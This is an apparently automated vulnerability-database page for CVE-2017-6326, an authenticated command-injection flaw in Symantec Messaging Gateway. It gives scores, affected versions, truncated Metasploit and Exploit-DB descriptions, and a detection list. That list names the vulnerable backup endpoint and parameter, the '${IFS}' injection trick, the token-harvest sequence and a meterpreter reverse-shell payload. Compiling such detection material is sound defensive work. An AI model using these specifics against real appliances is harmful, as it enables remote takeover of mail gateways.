CVE-2017-6326
published 2017-06-26CVE-2017-6326: The Symantec Messaging Gateway can encounter an issue of remote code execution, which describes a situation whereby an individual may obtain the ability to…
PriorityP182critical10CVSS 3.0
AVNACLPRNUINSCCHIHAH
EXPLOIT
EPSS
72.76%
99.4th percentile
The Symantec Messaging Gateway can encounter an issue of remote code execution, which describes a situation whereby an individual may obtain the ability to execute commands remotely on a target machine or in a target process.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| symantec | messaging_gateway | <= 10.6.3 | — |
| symantec_corporation | messaging_gateway | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor for POST requests to /brightmail/admin/backup/performBackupNow.do with a `remoteBackupPath` parameter containing command injection patterns such as `$(` or `${IFS}`. ↗
- →Detect use of `${IFS}` as a space-bypass technique in HTTP POST body parameters targeting the SMG backup endpoint. ↗
- →Alert on authenticated sessions that access /brightmail/admin/backup/backupNow.do followed immediately by a POST to performBackupNow.do — this is the CSRF-token-harvest-then-exploit sequence used by the module. ↗
- →Look for the hidden form field `symantec.brightmail.key.TOKEN` being scraped via GET before a POST to the backup endpoint, indicating automated exploitation. ↗
- →Detect outbound SCP/SSH connections initiated by the SMG web server process (running as root) to attacker-controlled hosts, which is required for the exploit to deliver the payload. ↗
- →Flag the default Metasploit payload `python/meterpreter/reverse_tcp` spawned under the web server (root) context on the SMG appliance. ↗
- ·Exploitation requires valid credentials to the SMG admin interface — this is an authenticated RCE, not unauthenticated. Brute-force or credential-stuffing detections should be layered alongside exploit detection. ↗
- ·The exploit requires the attacker to operate a reachable SSH/SCP service; blocking outbound SSH from the SMG appliance to untrusted hosts mitigates payload delivery even if injection occurs. ↗
- ·Module was confirmed against SMG version 10.6.2-7 specifically; detection rules should be scoped to that version but may apply to adjacent versions. ↗
CVSS provenance
nvdv3.010.0CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Symantec Messaging Gateway 10.6.2-7 - Remote Code Execution (Metasploit)
exploitdb·2017-06-26
CVE-2017-6326 Symantec Messaging Gateway 10.6.2-7 - Remote Code Execution (Metasploit)
Symantec Messaging Gateway 10.6.2-7 - Remote Code Execution (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule "Symantec Messaging Gateway Remote Code Execution",
'Description' => %q{
This module exploits the command injection vulnerability of Symantec Messaging Gateway product. An authenticated user can execute a
terminal command under the context of the web server user which is root.
backupNow.do endpoint takes several user inputs and then pass them to the internal service which is responsible for executing
operating system command. One of the user input is being passed to the service without proper validation. That cause an command
injection vulnerability. Bu
Metasploit
Symantec Messaging Gateway Remote Code Execution
metasploit
Symantec Messaging Gateway Remote Code Execution
Symantec Messaging Gateway Remote Code Execution
This module exploits the command injection vulnerability of Symantec Messaging Gateway product. An authenticated user can execute a terminal command under the context of the web server user which is root. backupNow.do endpoint takes several user inputs and then pass them to the internal service which is responsible for executing operating system command. One of the user input is being passed to the service without proper validation. That cause a command injection vulnerability. But given parameters, such a SSH ip address, port and credentials are validated before executing terminal command. Thus, you need to configure your own SSH service and set the required parameter during module usage. This module was tested against Symantec Messaging G
No writeups or analysis indexed.
http://www.securityfocus.com/bid/98893http://www.securitytracker.com/id/1038785https://www.exploit-db.com/exploits/42251/https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20170621_00http://www.securityfocus.com/bid/98893http://www.securitytracker.com/id/1038785https://www.exploit-db.com/exploits/42251/https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20170621_00
2017-06-26
Published